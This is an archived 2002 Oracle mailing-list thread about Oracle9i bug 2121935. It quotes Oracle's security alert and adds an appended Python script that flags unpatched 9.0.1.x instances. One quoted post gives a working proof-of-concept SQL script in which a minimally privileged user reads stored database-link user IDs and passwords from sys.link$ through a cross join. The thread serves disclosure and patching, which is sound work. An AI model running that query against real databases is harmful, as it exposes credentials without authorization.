RE: security bug - join syntax
Bug is fixed in 9.0.1.3 (or was it .2, I forget), and is not present in 9.2 (9iR2). A backport for 9.0.1.1 is available as I recall.

Robert G. Freeman - Oracle OCP
Oracle Database Architect
CSX Midtier Database Administration
Author
Oracle9i RMAN Backup and Recovery (Oracle Press - Oct 2002)
Oracle9i New Features (Oracle Press)
Mastering Oracle8i (Sybex)

Clark Griswold: Eddie, has anyone ever told you that you're bad luck?
Cousin Eddie: Those were my mother's dying words. But I guess if your body's covered in third degree burns, and your foot's caught in a bear trap, you tend to start talkin' crazy.

-Original Message-
Sent: Friday, July 19, 2002 2:58 PM
To: Multiple recipients of list ORACLE-L

Is this still a problem in 9iR2? I do not have it installed yet :(

- Kirti

> -Original Message-
> From: [EMAIL PROTECTED] [SMTP:[EMAIL PROTECTED]]
> Sent: Friday, July 19, 2002 12:05 PM
> To: Multiple recipients of list ORACLE-L
> Subject: Re: security bug - join syntax
>
> Thanks Linda.
>
> Usenet seems to be a little behind the curve though.
>
> Jonathan Lewis discovered this and posted on the list
> ( you saw it here first! ) over a month ago.
>
> Jared
>
> [EMAIL PROTECTED]
> Sent by: [EMAIL PROTECTED]
> 07/19/2002 09:23 AM
> Please respond to ORACLE-L
>
> To: Multiple recipients of list ORACLE-L <[EMAIL PROTECTED]>
> cc:
> Subject: Re: security bug - join syntax
>
> This just in from comp.databases.oracle.server.
>
> See metalink bug 2121935.
>
> Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)
> allows you to view data from tables on which you have no
> privilege.
> For example, try this COMPLETE script:
>
> connect / as sysdba
> create user us1 identified by us1;
> grant create session to us1;
>
> connect us1/us1
>
> select userid, password
> from
> sys.link$ cross join dual
> ;
>
> "Adams, Matthew (GEA, MABG, 088130)" <[EMAIL PROTECTED]>@fatcity.com
> on 07/19/2002 11:04:17 AM
>
> Please respond to [EMAIL PROTECTED]
>
> Sent by: [EMAIL PROTECTED]
>
> To: Multiple recipients of list ORACLE-L <[EMAIL PROTECTED]>
> cc:
>
> Anybody remember the bug number for the security issue
> with the new join syntax in 9i?
>
> Matt Adams - GE Appliances - [EMAIL PROTECTED]
> The ozone layer or cheese in a spray can.
> Don't make me choose.
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author:
>   INET: [EMAIL PROTECTED]
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
>
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
--
Please see the official ORACLE-L FAQ: http://www.orafaq.com
--
Author: Deshpande, Kirti
  INET: [EMAIL PROTECTED]

--
Author: Freeman, Robert
  INET: [EMAIL PROTECTED]
RE: security bug - join syntax
re: Bug 2121935

---metalink excerpts---

Doc ID: 190077.1
List of Bugs fixed in Oracle9i Release 2 base release (9.2.0.1)

This is a listing of the main bugs fixed in the Oracle9i Release 2 base release. The bugs are listed in categories related to the product area and/or symptom of the bug. A bug may be listed in more than one section.

* indicates that an alert exists for this bug.
+ indicates a particularly notable bug.
"OERI" is used as a short notation for ORA-600.

Bug Fixes by Category
...
Security
...
2121935* User Privileges Vulnerability in Oracle9i Database Server
...
* Fixed: 9201 Security
This problem is introduced in Oracle9i (9.0.1). There is a user privileges vulnerability in Oracle9i Database Server. See ...

---

Doc ID: Note:185074.1
Subject: ALERT: User Privileges Vulnerability in Oracle9i Database Server
Type: ALERT
Status: PUBLISHED
Content Type: TEXT/PLAIN
Creation Date: 18-APR-2002
Last Revision Date: 25-APR-2002

Oracle Security Alert #33
Dated: 17 April 2002

User Privileges Vulnerability in Oracle9i Database Server

Description
~~~~~~~~~~~
A potential security vulnerability has been discovered in Oracle9i database server. It is possible to create a user defined in the Oracle9i database server with limited privileges who can potentially access privileged data using SQL syntax for outer joins. As such, a knowledgeable and malicious user can gain unauthorized access to data in Oracle9i database server. None of the Oracle8i (Release 8.1.x), Oracle8 (Release 8.0.x) or Oracle7 database server releases is affected by this vulnerability.

Products affected
~~~~~~~~~~~~~~~~~
Oracle9i Database, Release 9.0.1.x, only

Platforms affected
~~~~~~~~~~~~~~~~~~
All

Workarounds
~~~~~~~~~~~
There are no workarounds to protect against this potential vulnerability.

Patch Information
~~~~~~~~~~~~~~~~~
Oracle has fixed the potential vulnerability identified above in the upcoming Oracle Database server release, Oracle9i, Release 2.
Patches with the base bug number, 2121935, are being made available only for supported releases of Oracle9i, Releases 9.0.1.x, database server on all supported platforms. For Windows NT and 2000, the patch is included in 2338791 for 9.0.1.3.

Download currently available patches for your platform from Oracle Support web site, iSupport, http://metalink.oracle.com. Activate the "Patches" button to get to the patches Web page. Enter the base bug fix number indicated above and activate the "Submit" button. Please check MetaLink or Oracle Support Services periodically for patch availability if the patch for your platform is not yet available.

Oracle strongly recommends that you comprehensively test the stability of your system upon application of any patch prior to deleting any of the original file(s) that are replaced by the patch.

Change Record
~~~~~~~~~~~~~
Windows NT and 2000 bug information was added to the Patch Information section of this alert on 25-Apr-02.

---
Copyright (c) 1995,2000 Oracle Corporation. All Rights Reserved. Legal Notices and Terms of Use.

On 19 Jul 2002 at 10:58, Deshpande, Kirti wrote:

Date sent: Fri, 19 Jul 2002 10:58:26 -0800
<[EMAIL PROTECTED]>
To: Multiple recipients of list ORACLE-L
Send reply to: [EMAIL PROTECTED]
Organization: Fat City Network Services, San Diego, California

> Is this still a problem in 9iR2? I do not have it installed yet :(
>
> - Kirti
>
> > -Original Message-
> > From: [EMAIL PROTECTED] [SMTP:[EMAIL PROTECTED]]
> > Sent: Friday, July 19, 2002 12:05 PM
> > To: Multiple recipients of list ORACLE-L
> > Subject: Re: security bug - join syntax
> >
> > Thanks Linda.
> >
> > Usenet seems to be a little behind the curve though.
> >
> > Jonathan Lewis discovered this and posted on the list
> > ( you saw it here first! ) over a month ago.
> >
> > Jared
> >
> > [EMAIL PROTECTED]
> > Sent by: [EMAIL PROTECTED]
> > 07/19/2002 09:23 AM
> > Please respond to ORACLE-L
> >
> > To: Multiple recipients of list ORACLE-L <[EMAIL PROTECTED]>
> > cc:
> > Subject: Re: security bug - join syntax
> >
> > This just in from comp.databases.oracle.server.
> >
> > See metalink bug 2121935.

--
Please see the official ORACLE-L FAQ: http://www.orafaq.com
--
Author: Eric D. Pierce
  INET: [EMAIL PROTECTED]
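An added example, not from the ORACLE-L thread or from Oracle's alert: a small Python triage of `v$version` banners against the facts the alert and the list fix note state (Oracle7, 8.0.x and 8.1.x not affected; 9.0.1.x affected, with one-off patches under bug 2121935; fix in the 9.2.0.1 base release). The hostnames and banners are constructed, and the `patch_2121935_applied` flag is an assumed stand-in for a patch inventory: a one-off patch on 9.0.1.x does not change the banner, so the banner alone can never clear a 9.0.1.x instance. Robert's recollection that 9.0.1.3 itself carries the fix is deliberately not relied on, since the alert lists a separate patch for 9.0.1.3; every 9.0.1.x instance is treated as needing confirmation.

```python
import re

# Added example (not from the ORACLE-L thread or Oracle Security Alert #33):
# triage v$version banners against bug 2121935 using only the facts the
# alert states: affected = Oracle9i 9.0.1.x only; Oracle7, Oracle8 (8.0.x)
# and Oracle8i (8.1.x) not affected; fixed in the 9.2.0.1 base release.
#
# Caveat encoded here: the one-off patch for 9.0.1.x does not change the
# banner, so a 9.0.1.x instance can only be cleared from the patch inventory.
# The patch_2121935_applied flag stands in for that inventory (an assumption).

BANNER_RE = re.compile(r"Release\s+(\d+(?:\.\d+)+)")


def parse_release(banner):
    """Return the dotted release number from a v$version banner as an int tuple."""
    m = BANNER_RE.search(banner)
    if m is None:
        raise ValueError("no release number in banner: %r" % banner)
    return tuple(int(part) for part in m.group(1).split("."))


def triage(banner, patch_2121935_applied=False):
    """Classify one instance: not_affected, fixed, patched, vulnerable or unknown."""
    rel = parse_release(banner)
    if rel[0] < 9:
        return "not_affected"           # 7.x, 8.0.x, 8.1.x per the alert
    if rel[:3] == (9, 0, 1):
        # the only affected line; the banner cannot show whether the patch is on
        return "patched" if patch_2121935_applied else "vulnerable"
    if rel[:2] >= (9, 2):
        return "fixed"                  # 9.2.0.1 base release carries the fix
    return "unknown"                    # nothing on the page about other 9.0.x


def instances_needing_action(inventory):
    """inventory: list of (host, banner, patch_applied); return hosts still exposed."""
    return sorted(host for host, banner, applied in inventory
                  if triage(banner, applied) == "vulnerable")


# Constructed sample inventory (hostnames and banners are made up).
SAMPLE_INVENTORY = [
    ("db01", "Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production", False),
    ("db02", "Oracle9i Enterprise Edition Release 9.0.1.3.0 - Production", True),
    ("db03", "Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production", False),
    ("db04", "Oracle8i Enterprise Edition Release 8.1.7.4.0 - Production", False),
    ("db05", "Oracle9i Enterprise Edition Release 9.0.1.3.0 - Production", False),
]

if __name__ == "__main__":
    for host, banner, applied in SAMPLE_INVENTORY:
        print(host, triage(banner, applied))
    print("needs patch 2121935:", instances_needing_action(SAMPLE_INVENTORY))
```

Running it over the sample inventory reports db01 and db05 as still needing the patch; db02 is the same 9.0.1.3 build as db05 and only clears because the inventory says the patch is on. Feed it the first row of `select banner from v$version` from each instance plus whatever record you keep of applied one-off patches.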